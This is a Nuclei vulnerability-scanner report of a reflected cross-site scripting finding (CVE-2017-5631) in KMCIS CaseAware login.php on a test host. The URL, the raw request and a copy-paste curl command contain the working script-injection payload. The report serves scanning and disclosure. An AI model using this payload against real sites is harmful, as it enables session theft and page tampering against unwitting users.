KMCIS CaseAware - Cross-Site Scripting (CVE-2017-5631) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2017-5631 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:03 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/7547ff00527641e0b6a625fd18d2a303

Template Information

Key	Value
Name	KMCIS CaseAware - Cross-Site Scripting
Authors	edoardottt
Tags	cve2017, cve, edb, xss, caseaware, kmc_information_systems
Severity	medium
Description	KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
Remediation	To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
CVSS-Metrics	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2017-5631
CVSS-Score	6.10
vendor	kmc_information_systems
product	caseaware

Request

GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 332
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:03 GMT

GET /login.php?mid=0&usr=admin'></script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3

References:

• https://www.openbugbounty.org/incidents/228262/
• https://www.exploit-db.com/exploits/42042/
• https://nvd.nist.gov/vuln/detail/CVE-2017-5631
• https://github.com/ARPSyndicate/cvemon
• https://github.com/ARPSyndicate/kenzer-templates

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3' 'https://honey.scanme.sh/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

---

Generated by Nuclei v3.2.5